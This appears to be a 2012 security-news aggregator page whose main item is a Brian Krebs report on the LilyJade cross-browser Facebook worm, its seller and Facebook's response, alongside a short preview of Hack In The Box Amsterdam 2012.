http://h30565.www3.hp.com/t5/UK-Articles/I-Was-a-Teenage-Telecommuter-Harsh-Lessons-for-Me-and-my-Boss/ba-p/3743 #HPIO UK

'I Was a Teenage Telecommuter' – Harsh Lessons for... - Input Output

Hack In The Box Amsterdam 2012 – Preview

Corelan Team (corelanc0d3r) — Thu, 17 May 2012 07:45:31 +0000

In less than a week from now, Hack In The Box Amsterdam will open its 2012 edition. The conference will take place in the Okura Hotel, and features 3 days of training, 2 days of quad-track talks, a CTF and HackWEEKDAY, a 12 hour hackathon hosted alongside the actual confererence. The line-up looks promising...

Facebook Takes Aim at Cross-Browser ‘LilyJade’ Worm

BrianKrebs — Thu, 17 May 2012 05:17:37 +0000

Facebook is attempting to nip in the bud a new social networking worm that spreads via an application built to run seamlessly as a plugin across multiple browsers and operating systems. In an odd twist, the author of the program is doing little to hide his identity, and claims that his “users” actually gain a security benefit from installing the software.

At issue is a program that the author calls “LilyJade,” a browser plugin that uses Crossrider, an emerging programming framework designed to simplify the process of writing plugins that will run on Google Chrome, Internet Explorer, and Mozilla Firefox. The plugin spreads by posting a link to a video on a user’s Facebook wall, and friends who follow the link are told they need to accept the installation of the plugin in order to view the video. Users who install LilyJade will have their accounts modified to periodically post links that help pimp the program.

The goal of LilyJade is to substitute code that specifies who should get paid when users click on ads that run on top Internet properties, such as Facebook.com, Yahoo.com, Youtube.com, Bing.com, Google.com and MSN.com. In short, the plugin allows customers to swap in their own ads on virtually any site that users visit.

I first read about LilyJade in an analysis published earlier this month by Russian security firm Kaspersky Labs, and quickly recognized the background from the screenshot included in that writeup as belonging to user from hackforums.net. This is a relatively open online hacking community that is often derided by more elite and established underground forums because it has more than its share of adolescent, novice hackers (a.k.a. “script kiddies”) who are eager to break onto the scene, impress peers, and make money.

It turns out that the Hackforums user who is selling this plugin is doing so openly using his real name. Phoenix, Ariz. based hacker Dru Mundorff sells the LilyJade plugin for $1,000 to fellow Hackforums members. Mundorff, 29, says he isn’t worried about the legalities of his offering; he’s even had his attorney sign off on the terms of service that each user of the plugin is required to agree to before installing it.

“We’re not forcing any users to be bypassed, exploited or anything like that,” Mundorff said in a phone interview. “At that point, if they do agree, it will allow us to make posts on their wall through our system.”

Mundorff claims his plugin is actually a benefit to Facebook and the Internet community at large because it is designed to also remove infections from some of the more popular bot and Trojan programs currently for sale on Hackforums, including Darkcomet, Cybergate, Blackshades and Andromeda (the latter being a competitor to the password-stealing ZeuS Trojan that hides behind Facebook comments). Mundorff maintains that his plugin will result in a positive experience for the average Facebook user, although he acknowledges that customers who purchase LilyJade can modify at will the link that “users” are forced to spread, and may at any time swap in links to malware or exploit sites.

A LilyJade administrative panel

Dozens of customers who bought or trialed LilyJade posted statistics to Hackforums that purport to show the plugin spreading virally to tens of thousands of users per day. According to Mundorff, customers who use the system can expect to make about 50 cents per hour for every 100 users who install the plugin.

It’s impossible to verify those numbers or to say exactly how many Facebook users have installed this browser plugin. But the plugin has apparently been successful enough to have caught the attention of Facebook’s security team, which earlier this week sent Mundorff a cease-and-desist order demanding that he stop selling the program.

“Plugins such as LilyJade are configured to modify our [site] to inject ads and/or send spam through Facebook to the victim’s friends via wall posts and chat messages,” said Fred Wolens, public policy manager at Facebook. “These alterations materially change people’s Facebook experience and bypass Facebook’s quality and security controls. Additionally, programs like LilyJade can make Facebook slower, cause user confusion and can obfuscate authenticate user content by displaying banner ads.”

In a follow-up instant message conversation, Mundorff indicated that he has no intention of bowing to Facebook’s demands.

“I pretty much told them to go fuck themselves cause we cant post on anyones [sic] walls with out there [sic] permissions automated or not,” Mundorff said. “So they can go to hell.”

It remains to be seen who will prevail in this now-public battle (which according to Mundorff has since caught the interest of the anarchic hacker collective Anonymous). I wanted to call attention to this topic because I believe LilyJade is likely the precursor to a stream of malicious cross-browser plugins that we can expect in the coming months and years.

Plugin based threats seem to be especially pernicious because they work seamlessly across multiple operating systems and browsers, and are unlikely to be detected as malicious by antivirus software. What’s more, writing malicious plugins for different browsers has never been easier: Kango, an up-and-coming cross-browser plugin development environment that’s competing with Crossrider, supports plugins on even more browsers, including Opera and Safari.

The purpose of this post is not to cause alarm about legitimate development platforms like Crossrider and Kango, or even to dissuade people from using Facebook. It’s also true that rogue browser plugins are hardly a new problem, and that they can spread just as easily on Facebook as on Twitter, Pinterest or any other community where millions of users gather to share information. Rather, I wanted to remind readers that while modern malware can take many forms, it most often succeeds because computer users agree to install it in one form or another.

When in doubt, always consider Rule #1 from Krebs’s 3 Basic Rules for Online Safety: “If you didn’t go looking for it, don’t install it!” Religiously observing this advice will likely keep you safe from a huge percentage of the malware threats out there today.